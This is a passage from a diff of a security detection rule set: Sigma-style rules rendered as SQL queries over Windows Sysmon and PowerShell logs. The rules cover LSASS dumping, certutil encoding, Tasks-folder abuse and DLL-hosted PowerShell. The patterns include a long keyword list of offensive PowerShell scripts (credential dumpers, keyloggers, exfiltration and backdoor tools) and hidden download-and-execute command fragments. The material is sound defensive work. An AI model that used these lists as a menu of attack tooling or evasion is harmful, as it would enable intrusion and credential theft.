Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Use Get-NetTCPConnection - PowerShell Module", - "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "status": "experimental", - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + 